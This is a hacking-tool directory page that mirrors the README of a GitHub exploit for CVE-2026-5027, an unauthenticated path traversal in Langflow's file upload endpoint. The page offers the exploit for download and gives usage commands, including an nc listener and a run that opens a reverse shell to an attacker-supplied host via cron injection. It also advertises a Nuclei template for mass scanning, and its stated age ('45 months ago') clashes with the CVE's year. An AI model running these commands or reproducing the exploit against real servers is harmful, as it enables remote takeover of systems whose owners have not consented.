Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2026-5027
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

View Repository
45 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🔥 CVE-2026-5027 - Langflow Path Traversal

Cybersecurity vulnerability_ path traversal exploit

Arbitrary File Write to RCE
Unauthenticated Remote Code Execution via File Upload

CVE CVSS Exploit

📌 Overview

Langflow suffers from a critical path traversal vulnerability in the file upload endpoint (POST /api/v2/files).

An attacker can send a malicious filename containing ../ sequences to write arbitrary files anywhere on the server filesystem.

This easily leads to full Remote Code Execution (RCE) — for example by dropping a webshell or injecting into crontab.


🛠️ Features

  • ✅ Unauthenticated exploitation (default auto-login setups)
  • ✅ Simple Proof-of-Concept (writes test file to /tmp)
  • ✅ Full Reverse Shell via cron (Linux)
  • ✅ Nuclei template included for mass scanning
  • ✅ Easy to customize traversal depth

🚀 Quick Start

1. Proof of Concept (Safe Test)

root@kitploit:~
python3 CVE-2026-5027.py -t http://target:7860/ --proof

Expected output if vulnerable:

root@kitploit:~
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt

2. Full Reverse Shell

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 Repository Contents

FileDescription
CVE-2026-5027.pyMain Python Exploit (PoC + RCE)
CVE-2026-5027.yamlNuclei Template for scanning
README.mdThis file

🎯 Usage Examples

cve-2026-5027

Proof Mode

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --proof

Reverse Shell Mode

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ Disclaimer

This repository is for educational and authorized security testing purposes only.

Use responsibly and only on systems you have explicit permission to test.


Made with ❤️ for the red team community

Download Tool